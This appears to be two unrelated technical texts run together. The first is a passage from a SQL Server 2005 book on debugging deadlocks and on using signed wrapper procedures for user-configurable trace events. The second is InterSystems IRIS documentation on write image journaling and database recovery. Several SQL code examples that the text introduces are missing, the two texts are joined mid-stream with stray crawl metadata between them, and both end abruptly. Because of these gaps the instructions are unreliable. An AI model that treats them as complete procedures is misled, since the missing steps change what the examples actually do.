deadlock condition, and the Deadlock graph event will help with a graphical display of what went wrong. You might optionally consider adding the SP:StmtStarting event, in case one or more of the stored procedures you’re debugging are running numerous statements, any of which might be contributing to the deadlock. You should also add the EventSequence column, in order to make it easier to analyze the data after collection. Figure 2-17 shows the completed Events Selection dialog box for this activity. Tip In this example, we will show you how to run the statements in exactly the correct order and at the correct times to force a deadlock to occur while you watch the trace in SQL Server Profiler. However, in many real-world situations it’s not quite that easy; many deadlocks depend upon exact timing (or mistiming) and to reproduce them you’ll have to run each query in a loop, hoping that they eventually collide in just the right way. SQL Server Management Studio also has a feature to help you run a query in a loop as many times as you’d like. In each query window, set up the batch for your queries, then follow the batch with GO and the number of times you’d like the query to run. For example, the following Transact-SQL code will execute the MyStoredProcedure stored procedure 1,000 times: EXEC MyStoredProcedure GO 1000 Figure 2-17 Completed Events Selection dialog box for debugging deadlocking queries Once your events are set up, start the trace in Profiler. Note that no filters should be used in this case, as the Deadlock graph event may be fired by any number of system spids. As a result of the lack of filters, you’ll see some system lock activity. This can be ignored or filtered out after the trace has been completed. Another strategy is covered later in this chapter, in the “Reducing Trace Overhead” section. Once the trace is started, return to the first query window (spid 52 in our test), and run the following batch: Next, run the following batch in the second query window (spid 53 in our test): Both of these queries should return, since their locks are compatible; they’re each taking locks on different rows of the Deadlock_Table table. Back in the first query window, start the following update, which will begin waiting on the second window’s session to release its lock: Finally, return to the second window and run the following update, which will start waiting on the first window’s session to release its lock. Since both sessions will now be waiting for each other to release resources, a deadlock will occur: After the deadlock has occurred the trace can be stopped. Find the Deadlock graph event produced, which should look something like the one shown in Figure 2-18. The Deadlock graph event includes a huge amount of data to help you debug what occurred. Included are the object ID, the index name (if appropriate), and the HoBt (Hash or B-Tree) ID, which can be used to filter the locking resource even further, by using the hobt_id column of the sys.partitions view. In addition, you can determine the actual queries that were involved in the deadlock by scrolling back and finding the last query event run by each spid prior to the deadlock occurring. Figure 2-18 Viewing the Deadlock graph event in SQL Server Profiler Should you need more data to debug further, you also have a wealth of lock information available. You might notice that in the screenshot, none of the lock events adjacent to the Deadlock graph event have anything to do with the spids with which we were working. The system acquires and releases quite a few locks even while at rest, so to look at the lock chain in more detail you’ll want to load the data into a trace table and make use of the EventSequence column to rebuild exactly what happened, in the correct order. As with performance analysis, SQL Trace will not actually resolve the deadlock condition for you, but it will provide you with ample data to help you determine its cause and get closer to a resolution. In the next section, we’ll explore other debugging tricks with SQL Trace. Stored Procedure Debugging SQL Server 2005 includes many different tools to help you debug complex stored procedures. These include a Transact-SQL debugger available in Visual Studio, the ability to embed print statements or otherwise return debug statuses from your stored procedures, and the ability to raise custom errors from within your stored procedures in order to log status information. SQL Trace also supplies an underpublicized tool that can be helpful in this regard, called user-configurable events. A user-configurable event is nothing more than a call to a system stored procedure called sp_trace_generateevent. This stored procedure accepts three parameters: - @eventid is an integer value between 82 and 91. Each value corresponds to one of the 10 user configurable event classes, numbered from 0 through 9; a value of 82 will raise a UserConfigurable:0 event, 83 will raise a UserConfigurable:1 event, etc. - @userinfo is an nvarchar(128) value that will be used to populate the TextData column for the event. - @userdata is a varbinary(8000) value that will be used to populate the BinaryData column for the event. In a few especially tricky situations, we’ve had to deal with stored procedures that only occasionally failed, under circumstances that were difficult to replicate in a test environment. Long-term tracing in these situations can be difficult, as to really debug the situation might require statement-level collection, which will produce a lot of data if run for extended periods. A better option is to trace at the stored-procedure- and batch-level only, and use user configurable events to collect variable values and other data to help you debug the problem when it does actually occur. This way you can leave the system running and functional, without having to worry about your trace collecting too much data. To set this up, you must first be aware that the sp_trace_generateevent stored procedure requires ALTER TRACE permission in order to be run. Since it’s unlikely that your stored procedures will have access to that permission, it is a good idea to create a wrapper stored procedure that calls sp_trace_generateevent, and which has the appropriate permission. To make this happen, we’ll have to employ SQL Server 2005’s module signing feature. The first step is to create a certificate in the master database: Next, a login is created based on the certificate. The login is granted both ALTER TRACE permission, as well as AUTHENTICATE SERVER permission, the latter of which gives it the right to propagate server-level permissions to database-level modules (such as the wrapper stored procedure): Once that’s taken care of, back up the certificate, including the private key. The backup will be used to restore the same certificate in any user database in which you’d like to use the wrapper stored procedure. For the sake of this chapter’s sample code, we’ll show you how to build the wrapper procedure in tempdb, but in reality you could do this in any user database. The following code creates a certificate in tempdb from the backed-up version, then creates a simple wrapper over the sp_trace_generateevent stored procedure: USE tempdb GO CREATE CERTIFICATE ALTER_TRACE_CERT FROM FILE='C:\ALTER_TRACE.cer' WITH PRIVATE KEY ( FILE='C:\ALTER_TRACE.pvk', ENCRYPTION BY PASSWORD='-UsE_a!sTr0Ng_PwD-or-3~', DECRYPTION BY PASSWORD='-UsE_a!sTr0Ng_PwD-or-3~' ) GO CREATE PROCEDURE ThrowEvent @eventid INT, @userinfo nvarchar(128), @userdata varbinary(8000) AS BEGIN EXEC sp_trace_generateevent @eventid = @eventid, @userinfo = @userinfo, @userdata = @userdata END GO To complete the exercise, the stored procedure is signed with the certificate—which gives the procedure effectively all of the same permissions as the ALTER_TRACE_LOGIN login, and then permission is granted for any user to run the stored procedure: Once the ThrowEvent stored procedure is created in the database(s) of your choice, you can begin using it from within other stored procedures, and, thanks to the certificate, you can do so without regard to what permissions the caller has. This can be an invaluable tool when trying to figure out the context around intermittent problems. For example, suppose that you find during testing that one of your stored procedures that should be updating a few rows in a certain table seems to not update anything from time to time. This problem seems to be caused by the state of yet another table at exactly the time the stored procedure is called, but you haven’t yet been able to reproduce things lining up in just that way. To help debug this, you might insert the following code into your stored procedure, just after the update: At this point, you would set up a trace to capture RPC:Starting and SQL:BatchStarting events, as well as the UserDefined:0 event. After letting it play for a while, once the user-defined event fires letting you know that no rows were inserted, you may have collected enough back data to figure out what state the other table was in at the exact time of the insert. This is somewhat of a contrived example, but it helps show the power of adding this tool to your stored procedure debugging toolkit. The more controllable visibility you have into what’s going on in your stored procedures, the easier it becomes to track down and fix small problems before they turn into major ones. In the next section, we’ll get into how to keep SQL Trace itself from causing you problems.< Back Next >
http://technet.microsoft.com/en-us/library/cc293616.aspx
CC-MAIN-2014-23
refinedweb
6,097
53.24
Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Takashi Iwai <tiwai@xxxxxxx> - Date: Fri, 08 Jun 2007 11:29:16 +0200 At Wed, 6 Jun 2007 21:53:08 +0200, Sam Ravnborg wrote: On Wed, Jun 06, 2007 at 09:36:48PM +0200, Jens Axboe wrote: On Tue, Jun 05 2007, Takashi Iwai wrote:It is the functionality of "default y" that is not understood. At Tue, 5 Jun 2007 15:25:07 +0200 (MEST), Jan Engelhardt wrote: Well, I find the change of CONFIG_SND to menuconfig is fine, too. But CONFIG_SND_PCI_DRIVERS and others don't make much sense to me. How is it useful at all? Hah, I just tell you some of my own experience. In summer 2003, I bought the last new machine, and it got these shiny new ports they like to call USB. :) I did not have much use for it, but I left it on - you never know what standard next is the big win of the decade. And actually, it did not took long (well, summer 2005) to get my first USB device. Still, I am hell as sure I do not have USB-based sound devices anytime soon, so it would be cool to deactivate the whole usbsound menu at once. I think I said that in the patch description, did not I? But it's not cool to add an extra config item just for that, too. And, the structure of menuconfig-if-endif is uglier than menu-endmenu. That's why I feel a bit uneasy, although all these are a matter of taste... Forgot to mention about another annoying drawback. Because of the new CONFIG_SND_*_DRIVERS, you'll have to re-select all belonging CONFIG_SND_*, even via config oldconfig. Putting the dependency on the top seems to reset the values defined in the old .config. Well, *I* (previously) submitted patches with "default y", but Jens Axboe [] disagreed heavily enough to stop that practice. Hm, I guess Jens didn't know about this side-effect. When I don't set "default y", I'll be asked for each belonging item even though I chose "y" manually for the top config (CONFIG_*_DRIVERS). Strangely, setting "default y" has no this effect... That sounds like a bug in the kconfig system. I still think default y is an *awful* idea, but you can read why in the thread referenced above. Take the following simple Kconfig file: config FOO bool "FOO" default y config BAR bool "BAR" What would you expect when you execute "make oldconfig"? You would expect to be questioned about both symbols and pressing enter would give you the following config: CONFIG_FOO=y #CONFIG_BAR is not set So "default y" in the oldconfig case where we add a symbol gives the default value if you just press enter. If you use "make menuconfig" and just enter menuconfig and exit and save you will end up with exact same configuration as above because menuconfig will select default values for all new symbols. In other words "default y" has no impact on what oldconfig asks about, only what value will be assigned if user decide not to change the value. And this is exactly what it is supposed to do and no magic "do not ask user" thing. That can be solved by having correct dependencies so if the dependencies are not solved one will not be asked. Well, then "default y" seems sensible for the new additions like this case (adding a menuconfig top-dependency that was formerly a simple Anyway, I think it's another problem of kconfig that it resets the old values when a new top-config is introduced without "default y". Assume the following kconfig: menu "Foo" depends on DOH config BAR bool "Bar" depends on DOH endmenu and an old .config file CONFIG_DOH=y CONFIG_BAR=y Now, replace menu with menuconfig: menuconfig FOO bool "Foo" depends on DOH if FOO config BAR bool "Bar" endif Run make oldconfig, and you'll be asked about FOO (as expected). Answer y, then you'll be asked again about BAR, too. But, if "default"y is added to FOO, menuconfig FOO bool "Foo" default y depends on DOH then it asks about FOO, but it won't ask you about BAR. Takashi - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at Please read the FAQ at - References: - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Takashi Iwai - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Takashi Iwai - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Jan Engelhardt - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Takashi Iwai - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Jens Axboe - Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - From: Sam Ravnborg - Prev by Date: Re: Interesting interaction between lguest and CFS - Next by Date: Re: floppy.c soft lockup - Previous by thread: Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken - Next by thread: 2.6.22-rc4-ext4-1 - Index(es):
http://linux.derkeiler.com/Mailing-Lists/Kernel/2007-06/msg03250.html
CC-MAIN-2017-17
refinedweb
898
69.01
Now that we have followed the rules of database normalization and have data separated into two tables, linked together using primary and foreign keys, we need to be able to build a SELECT that re-assembles the data across the tables. SQL uses the JOIN clause to re-connect these tables. In the JOIN clause you specify the fields that are used to re-connect. The result of the JOIN is to create extra-long “meta-rows” which have both the fields from People and the matching fields from Follows. Where there is more than one match between the id field from People and the from_id from People, then JOIN creates a meta-row for each of the matching pairs of rows, duplicating data as needed. The following code demonstrates the data that we will have in the database after the multi-table Twitter spider program (above) has been run several times. import sqlite3 conn = sqlite3.connect('spider.sqlite3')cur = conn.cursor() cur.execute('SELECT * FROM People')count = 0print 'People:'for row in cur : if count < 5: print row count = count + 1print count, 'rows.' cur.execute('SELECT * FROM Follows')count = 0print 'Follows:'for row in cur : if count < 5: print row count = count + 1print count, 'rows.' cur.execute('''SELECT * FROM Follows JOIN People ON Follows.from_id = People.id WHERE People.id = 2''')count = 0print 'Connections for id=2:'for row in cur : if count < 5: print row count = count + 1print count, 'rows.' cur.close() In this program, we first dump out the People and Follows and then dump out a subset “meta-rows” in the last select, the first two columns are from the Follows table followed by columns three through five from the People table. You can also see that the second column (Follows.to_id) matches the third column (People.id) in each of the joined-up “meta-rows”. - 瀏覽次數:660
http://www.opentextbooks.org.hk/zh-hant/ditatopic/6819
CC-MAIN-2021-17
refinedweb
312
70.84
- Prerequisites - Create a new project - Add the SVG icon to GitLab SVGs - Vendoring process - Test with GDK - Contribute an improvement to an existing template Contribute to GitLab project templates Thanks for considering a contribution to the GitLab built-in project templates. Prerequisites To add a new or update an existing template, you must have the following tools installed: wget tar jq Create a new project To contribute a new built-in project template to be distributed with GitLab: - Create a new public project with the project content you’d like to contribute in a namespace of your choosing. You can view a working example. Projects should be as simple as possible and free of any unnecessary assets or dependencies. - When the project is ready for review, create a new issue with a link to your project. In your issue, Add the SVG icon to GitLab SVGs If the template you’re adding has an SVG icon, you need to first add it to - Follow the steps outlined in the GitLab SVGs project and submit a merge request. - When the merge request is merged, gitlab-botwill pull the new changes in the gitlab-org/gitlabproject. - You can now continue on the vendoring process. Vendoring process To make the project template available when creating a new project, the vendoring process will have to be completed: - Export the project you created in the previous step and save the file as <name>.tar.gz, where <name>is the short name of the project. - Edit the following files to include the project template. Two types of built-in templates are available within GitLab: Normal templates: Available in GitLab Free and above (this is the most common type of built-in template). See MR !25318 for an example. To add a normal template: Open lib/gitlab/project_template.rband add details of the template in the localized_templates_tablemethod. In the following example, the short name of the project is hugo: ProjectTemplate.new('hugo', 'Pages/Hugo', _('Everything you need to create a GitLab Pages site using Hugo'), ' 'illustrations/logos/hugo.svg'), If the vendored project doesn’t have an SVG icon, omit , 'illustrations/logos/hugo.svg'. - Open spec/lib/gitlab/project_template_spec.rband add the short name of the template in the .alltest. Open app/assets/javascripts/projects/default_project_templates.jsand add details of the template. For example: hugo: { text: s__('ProjectTemplates|Pages/Hugo'), icon: '.template-option .icon-hugo', }, If the vendored project doesn’t have an SVG icon, use .icon-gitlab_logoinstead. Enterprise templates: Introduced in GitLab 12.10, that are available only in GitLab Premium and above. See MR !28187 for an example. To add an Enterprise template: Open ee/lib/ee/gitlab/project_template.rband add details of the template in the localized_ee_templates_tablemethod. For example: ::Gitlab::ProjectTemplate.new('hipaa_audit_protocol', 'HIPAA Audit Protocol', _('A project containing issues for each audit inquiry in the HIPAA Audit Protocol published by the U.S. Department of Health & Human Services'), ' 'illustrations/logos/asklepian.svg') - Open ee/spec/lib/gitlab/project_template_spec.rband add the short name of the template in the .alltest. Open ee/app/assets/javascripts/projects/default_project_templates.jsand add details of the template. For example: hipaa_audit_protocol: { text: s__('ProjectTemplates|HIPAA Audit Protocol'), icon: '.template-option .icon-hipaa_audit_protocol', }, Run the vendor_templatescript. Make sure to pass the correct arguments: scripts/vendor_template <git_repo_url> <name> <comment> Regenerate gitlab.pot: bin/rake gettext:regenerate - By now, there should be one new file under vendor/project_templates/and 4 changed files. Commit all of them in a new branch and create a merge request. Test with GDK If you are using the GitLab Development Kit (GDK) you must disable praefect and regenerate the Procfile, as the Rake task is not currently compatible with it: # gitlab-development-kit/gdk.yml praefect: enabled: false - Follow the steps described in the vendoring process. Run the following Rake task where <path>/<name>is the name you gave the template in lib/gitlab/project_template.rb: bin/rake gitlab:update_project_templates[<path>/<name>] You can now test to create a new project by importing the new template in GDK. Contribute an improvement to an existing template Existing templates are imported from the following groups: To contribute a change, open a merge request in the relevant project and mention @gitlab-org/manage/import/backend when you are ready for a review. Then, if your merge request gets accepted, either open an issue to ask for it to get updated, or open a merge request updating the vendored template.
https://docs.gitlab.com/ee/development/project_templates.html
CC-MAIN-2022-21
refinedweb
741
56.55
Escape sequences aren't working correctly with @-rule names like @namespace or @import. Created attachment 44117 [details] Patch style-queue ran check-webkit-style on attachment 44117 [details] without any errors. Comment on attachment 44117 [details] Patch > +void CSSParser::recheckAtKeyword(const UChar* str, int len) > +{ > + String ruleName(str, len); This String construction should not be necessary. We should instead add a version of equalIgnoringCase() that takes a UChar* and a length instead of a String. This will avoid the allocation. Given that this is a really silly edge case that will never ever get hit in the real world, I'm not too concerned about making a single String. Fixed in r51600. *** Bug 21471 has been marked as a duplicate of this bug. ***
https://bugs.webkit.org/show_bug.cgi?id=32045
CC-MAIN-2021-43
refinedweb
123
65.32
I am having a weird issue with subprocess.Popen as invoked from my LaTeXTools plugin. A user reported the following bug: a LaTeX file containing a picture originally in eps format fails to compile when building from ST2, but builds just fine when invoking the exact same command that the plugin uses from the command line. What's special (sort of) about this file is that the LaTeX graphics package, upon encountering the eps file, is smart enough to invoke the epstopdf command from within tex, and then import the resulting pdf file. This is what fails under ST2. I can confirm that running the appropriate latex build command from the command line works just fine. In fact, I wrote a python script that invokes the exact same command used by the LaTeXTools plugin, using subprocess.Popen---again, this is copied line by line from the plugin. The results: if I run the script from the command line, everything works. If I run the script from within the ST2 console, I have exactly the same behavior that I observe when I build from ST2. I reproduce the script below for convenience. What is going on? Is there some limitation on processes run from ST2 that in turn spawn other processes? Note that TeXshop has no trouble at all with eps file conversion on the fly. Here's the script. Again, this is *not* the plugin code: just a standalone test script. The actual plugin code gets the file name from the current view, etc. Also note that the path is set so tex and friends (including epstopdf) are reachable. Also, I tested this on OS X; I haven't tried it on Windows. The problem exists up to the current release, 2134. - Code: Select all import sys, os, os.path import subprocess make_cmd = ["latexmk", "-e", "$pdflatex = q/pdflatex %O -synctex=1 %S/", "-f", "-pdf"] file_name = os.path.normpath("/Users/xxxxx/Documents/temp/sublimeTests/epstest/epstest.tex") tex_dir = os.path.dirname(file_name) cmd = make_cmd + [file_name] print cmd path = "$PATH:/usr/texbin" old_path = os.environ["PATH"] os.environ["PATH"] = os.path.expandvars(path).encode(sys.getfilesystemencoding()) os.chdir(tex_dir) proc = subprocess.Popen(cmd) proc.wait() os.environ["PATH"] = old_path print proc.returncode
http://www.sublimetext.com/forum/viewtopic.php?f=3&t=3459
CC-MAIN-2014-10
refinedweb
370
67.15
Back to: C#.NET Programs and Algorithms Automorphic Number Program in C# with Examples In this article, I am going to discuss the How to Implement the Automorphic Number Program in C# with Examples. Please read our previous article where we discussed the Happy Number Program in C#. Here, in this article, first, we will learn what is a Automorphic Number and then we will see how to implement the Automorphic Number Program in C#. And finally, we will see how to print all the Automorphic numbers between a range of numbers like between 1 to 100 or 100 to 1000, etc. What is an Automorphic Number? A number is said to be an Automorphic number if the square of the number will contain the number itself at the end. Example: 5 is an automorphic number Explanation: 5 * 5 = 25 //ends with 5 which is the original number. Example.: 7 is not an automorphic number Explanation: 7 * 7 = 49 //doesn’t ends with the number 7 How to implement the Automorphic Number Program in C#? We are going to use the very basic method to implement this program but before that, you should have some basic knowledge of the following operators. - Modulus(%) Operator - Divide(/) Operator In case if you are unfamiliar or not confident about these let’s have a look at our previous questions where we have discussed these in great detail like Duck Number, Disarium Number, Buzz Number, and Strong Number, etc. Solution Step1: Take a number from the user. Step2: Find the square of number by just multiplying it with the number itself and store this in a variable named square. Step3: Calculate or extract the last digit of both (the square number and the given number) numbers using the modulus % operator. Example: Given number: 25. Square number: 625 25 % 10 = 5 625 % 10 = 5 2 % 10 = 2 62 % 10 = 2 0 % 10 =0 6 % 10 = 6 This process will continue until the remainder value is not equal to 0. Step4: Compare the remainder of both the numbers. If it is not equal then immediately break the loop and print “Not Automorphic Number” otherwise repeat the process until the remainder =0 of the given number. Then simply Print the Automorphic Number. Note: If the loop will continue till the end which means all the digits of the number are present in the squared number. Example: Automorphic Number Program in C# The following sample code shows how to implement the Automorphic number program in C#. using System; public class AutomorphicProgram { public static void Main () { Console.Write ("Enter a number : "); int number = Convert.ToInt32 (Console.ReadLine ()); if (CheckAutomorphicNumber (number)) { Console.WriteLine ("Automorphic Number"); } else { Console.WriteLine ("Not Automorphic Number"); } Console.ReadLine (); } public static bool CheckAutomorphicNumber (int no) { int square = no * no; while (no > 0) { if (no % 10 != square % 10) { return false; } no = no / 10; square = square / 10; } return true; } } Output C# Program to Print all Automorphic Numbers Between 1 and N The following C# Program will allow the user to input a number. Then it will print all the Automorphic numbers between 1 and that input number. using System; public class AutomorphicProgram { public static void Main () { //Take input from end-user Console.WriteLine ("Enter an integer number:"); int number = Convert.ToInt32(Console.ReadLine ()); Console.WriteLine("Automorphic Numbers Between 1 and " + number + " : "); for (int i = 1; i <= number; i++) { if (CheckAutomorphicNumber(i)) { Console.Write (i + " "); } } Console.ReadLine (); } public static bool CheckAutomorphicNumber(int no) { int square = no * no; while (no > 0) { if(no % 10 != square % 10) { return false; } no = no / 10; square = square / 10; } return true; } } Output Here, in this article, I try to explain How to Implement the Automorphic Number Program in C# with Examples and I hope you enjoy this Automorphic Number Program in C# article.
https://dotnettutorials.net/lesson/automorphic-number-in-csharp/
CC-MAIN-2021-31
refinedweb
627
53.92
HI, I want to use same methods specific to OS but when I am trying to do so,I am only able to find out the OS name but it is not going inside that.I wrote a simple code as below -- and Output isand Output isQuote: public class OSnane { public static void main(String[] args) { String OsName=null; OsName=System.getProperty("os.name"); System.out.println("OS name="+OsName); if(OsName == "SunOS") System.out.println("hello Sun"); else if(OsName == "Windows XP") System.out.println("Hello Windows"); else if(OsName == "Linux") System.out.println("Hello Linux"); else System.out.println("No OS selected!!!"); } } So how can I use the method based on the OS..So how can I use the method based on the OS..Quote: OS name=SunOS No OS selected!!! Thanks in advance....
http://forums.devx.com/printthread.php?t=172386&pp=15&page=1
CC-MAIN-2015-11
refinedweb
136
61.73
Write Image Journaling and Recovery InterSystems IRIS® uses write image journaling to maintain the internal integrity of your InterSystems IRIS database. It is the foundation of the database recovery process. Write Image Journaling InterSystems IRIS safeguards database updates by using a two-phase technique, write image journaling, in which updates are first written from memory to a transitional journal, IRIS.WIJ, and then to the database. If the system crashes during the second phase, the updates can be reapplied upon recovery. The following topics are covered in greater detail: Write Image Journal (WIJ) File The Write daemon is activated at InterSystems IRIS startup and creates the write image journal (WIJ) file. The Write daemon records database updates in the WIJ before writing them to the InterSystems IRIS database. By default, the WIJ file is named IRIS.WIJ and resides in the system manager directory, usually install-dir/Mgr, where install-dir is the installation directory. To specify a different location for this file or the file’s target size, use the Management Portal: Navigate to the Journal Settings page of the Management Portal (System Administration > Configuration > System Configuration > Journal Settings). Enter the new location of the WIJ in the Write image journal directory box and click Save. The name must identify an existing directory on the system and may be up to 63 characters long. If you edit this setting for a clustered instance, restart InterSystems IRIS to apply the change; no restart is necessary for a standalone instance. Enter the target size for the WIJ at the Target size for the wij (MB) (0=not set) prompt. The default of zero allows the WIJ to grow as needed but does not reserve space for this; entering a non-zero value reserves the specified space on the storage device. For information about the two settings described, which are included in the instance’s iris.cpf file, see targwijsz and wijdir in the [config] section of the Configuration Parameter File Reference. Two-Phase Write Protocol InterSystems IRIS maintains application data in databases whose structure enables fast, efficient searches and updates. Generally, when an application updates data, InterSystems IRIS must modify a number of blocks in the database structure to reflect the change. Due to the sequential nature of disk access, any sudden, unexpected interruption of disk or computer operation can halt the update of multiple database blocks after the first block has been written but before the last block has been updated. The two-phase write protocol prevents this incomplete update from leading to an inconsistent database structure, which could occur with it. The consequences could be as severe as a database that is totally unusable, all data irretrievable by normal means. The InterSystems write image journaling technology uses a two-phase process of writing to the database to protect against such events as follows: In the first phase, InterSystems IRIS records the updated blocks in the WIJ. Once it enters all updates to the WIJ, it sets a flag in the file and the second phase begins. In the second phase, the Write daemon writes the same set of blocks recorded in the WIJ to the database on disk. When this second phase completes, the Write daemon sets a flag in the WIJ to indicate it is deleted. When InterSystems IRIS starts, it automatically checks the WIJ and runs a recovery procedure if it detects that an abnormal shutdown occurred. When the procedure completes successfully, the internal integrity of the database is restored. InterSystems IRIS also runs WIJ recovery following a shutdown as a safety precaution to ensure that database can be safely backed up. Recovery WIJ recovery is necessary if a system crash or other major system malfunction occurs. When InterSystems IRIS starts, it automatically checks the WIJ. If it detects that an abnormal shutdown occurred, it runs a recovery procedure. Depending on where the WIJ is in the two-phase write protocol process, recovery does the following: If the crash occurred after the last update to the WIJ was completed but before completion of the corresponding update to the databases—that is, during the second phase of the process—the WIJ is restored as described in WIJ Restore. If the crash occurred after the last WIJ update was durably written to the databases—that is, after both phases were completed—a block comparison is done between the most recent WIJ updates and the affected databases, as described in WIJ Block Comparison (Windows and UNIX®/Linux only). WIJ Restore If the WIJ is marked as “active,” the Write daemon completed writing modified disk blocks to the WIJ but had not completed writing the blocks back to their respective databases. This indicates that WIJ restoration is needed. The recovery program, iriswdimj, does the following: Informs the system manager in the messages log (messages.log) file; see Monitoring Log Files in the “Monitoring InterSystems IRIS Using the Management Portal” chapter of the Monitoring Guide. Performs Dataset Recovery. Typically, all recovery is performed in a single run of the iriswdimj program. Dataset Recovery A dataset is a specific database directory on a specific InterSystems IRIS system. The iriswdimj program restores all datasets configured in the InterSystems IRIS instance being restarted after an abnormal shutdown. The iriswdimj program can run interactively or non-interactively. The manner in which it runs depends on the platform, as follows: Windows — Always runs non-interactively. UNIX®/Linux — Runs non-interactively until encountering an error, then runs interactively if an operator is present to respond to prompts. When the iris start quietly command is used on UNIX/Linux systems, it always runs noninteractively. When the recovery procedure is complete, iriswdimj marks the contents of the WIJ as “deleted” and startup continues. If an error occurred during writing, the WIJ remains active and InterSystems IRIS will not start; recovery is repeated the next time InterSystems IRIS starts unless you override this option (in interactive mode). If you override the option to restore the WIJ, databases become corrupted or lose data. The following topics are discussed in more detail: Interactive Dataset Recovery The recovery procedure allows you to confirm the recovery on a dataset-by-dataset basis. Normally, you specify all datasets. After each dataset prompt, type either: Y — to restore that dataset N — to reject restoration of that dataset You can also specify a new location for the dataset if the path to it has been lost, but you can still access the dataset. Once a dataset has been recovered, it is removed from the list of datasets requiring recovery; furthermore, it is not recovered during subsequent runs of the iriswdimj program should any be necessary. Noninteractive Dataset Recovery When the recovery procedure runs noninteractively, InterSystems IRIS attempts to restore all datasets and mark the WIJ as deleted. On Unix® and Windows platforms, InterSystems IRIS first attempts a fast parallel restore of all datasets; in the event of one or more errors during the fast restore, datasets are restored one at a time so that the databases that were fully recovered can be identified. If at least one dataset cannot be restored: The iriswdimj program aborts and the system is not started. Any datasets that were not successfully recovered are still marked as requiring recovery in the WIJ. WIJ Block Comparison Typically, a running InterSystems IRIS instance is actively writing to databases only a small fraction of the time. In most crashes, therefore, the blocks last written to the WIJ were confirmed to have been durably written to the databases before the crash; the WIJ is not marked "active", and there is no WIJ restore to be performed. When InterSystems IRIS starts up after such a crash, however, the blocks in the most recent WIJ updates are compared to the corresponding blocks in the affected databases as a form of rapid integrity check, to guard against starting the instance in an uncertain state after a crash that was accompanied by a storage subsystem failure. The comparison runs for a short time to avoid impacting availability and asynchronous I/O is utilized to maximize throughput. If all blocks match, or no mismatch is detected within 10 seconds, startup continues normally. If a mismatch is found within this time, the results are as follows: The comparison operation continues until all available WIJ blocks have been compared. The mismatching WIJ blocks are written to a file called MISMATCH.WIJ in the WIJ directory. Normal startup is aborted and InterSystems IRIS starts in single-user mode with a message like the following: There exists a MISMATCH.WIJ file. Startup aborted, entering single user mode. Enter IRIS with iris terminal [instancename] -B and D ^STURECOV for help recovering from this error.Copy code to clipboard This situation calls for immediate attention. Use the information that follows to determine the appropriate course of action. When your recovery procedures are complete, you must rename the MISMATCH.WIJ file, either using the STURECOV routine or externally, before InterSystems IRIS startup can continue; the file is persistent and prevents normal startup of the instance. Run the indicated command to perform an emergency login as system administrator (see Administrator Terminal Session in the “Licensing” chapter of the System Administration Guide). You are now in the manager’s namespace and can run the startup recovery routine with the command Do ^STURECOV. The following WIJ mismatch recovery message and menu appear on a UNIX®/Linux system: rename the MISMATCH.WIJ. Otherwise, MISMATCH.WIJ probably contains blocks that were lost due to a disk problem. You can view those blocks and apply them if necessary. When finished, rename the MISMATCH.WIJ in order to continue startup. 1) List Affected Databases and View Blocks 2) Apply mismatched blocks from WIJ to databases 3) Rename MISMATCH.WIJ 4) Dismount a database 5) Mount a database 6) Database Repair Utility 7) Check Database Integrity 8) Bring up the system in multi-user mode 9) Display instructions on how to shut down the system -------------------------------------------------------------- H) Display Help E) Exit this utility -------------------------------------------------------------- On a Windows system, options 8 and 9 are replaced by 8) Bring down the system prior to a normal startup. Options 8) Rename MISMATCH.WIJ renames the file by apppending the date; if there is already a renamed MISMATCH.WIJ with that name, a number (such as _1) is appended. The appropriate actions in the event of a WIJ mismatch differ based on the needs and policies of your enterprise, and are largely the same as your site's existing practices for responding to events that imply data integrity problems. Considerations include tolerance for risk, criticality of the affected databases, uptime requirements, and suspected root cause. The following represent some considerations and recommendations specific to the WIJ block comparison process: Replacing, restoring, or making any changes to the databases or WIJ files after a crash and before recovery can lead to discrepancies that are then found during WIJ comparison and recorded in the MISMATCH.WIJ file. If this has occurred, rename MISMATCH.WIJ.Note: If a database is to be restored following a crash, ensure that prior to the restore you start the instance without WIJ and journal recovery (see Starting InterSystems IRIS Without Automatic WIJ and Journal Recovery in the “Backup and Restore” chapter of this guide). This avoids both creating discrepancies that will be detected by the WIJ comparison and incorrectly applying WIJ blocks or journal data (see the “Journaling” chapter of this guide) to a version of a database for which they were not intended. Some storage subsystems, particularly local drives on laptops and workstations, use an unsafe form of write-back caching that is not backed by battery or by non-volatile memory. This defeats the two-phase write protocol that InterSystems IRIS performs and can lead to corruption following a hardware crash or power loss that is detected during WIJ compare. If this applies to your system, it is likely that MISMATCH.WIJ contains more up-to-date data and therefore can be safely applied to the databases (assuming the system is one with which an abundance of caution is not required). If you have made any changes to the databases following the WIJ comparison, MISMATCH.WIJ is no longer valid and it is not safe to apply the WIJ blocks. For servers with enterprise-class storage or any storage subsystem that does not utilize an unsafe form of write-back caching, mismatches found during WIJ compare are always unexpected and warrant careful attention, as they may be a sign of a more serious or more widespread problem. Depending on the root cause of the problem, it may be that the databases are intact and it is the WIJ that is corrupted. An integrity check of the affected databases can help determine whether this is likely. Because WIJ comparison only covers the blocks written most recently, there may be problems affecting additional blocks that could be detected by a full integrity check (see Verifying Structural Integrity in the “Introduction to Data Integrity” chapter of this guide). If the databases are small and/or time allows you can follow a procedure similar to the following for optimal safety: Run a full integrity check on the databases. If none are corrupt, rename MISMATCH.WIJ and start up. If one or more databases are corrupt, copy the IRIS.DAT files for all databases, apply all blocks from MISMATCH.WIJ and run a full integrity check again. If any database is corrupt after applying MISMATCH.WIJ, the databases can be reverted to the previous copy or restored from a previous backup. Encrypted databases are excluded from the WIJ block comparison. If you are uncertain about how to proceed when WIJ mismatches are detected, contact the InterSystems Worldwide Response Center (WRC) Opens in a new window. Limitations of Write Image Journaling While the two-phase write protocol safeguards structural database integrity, it does not prevent data loss. If the system failure occurs prior to a complete write of an update to the WIJ, InterSystems IRIS does not have all the information it needs to perform a complete update to disk and, therefore, that data is lost. However, data that has been written to a journal file is recovered as 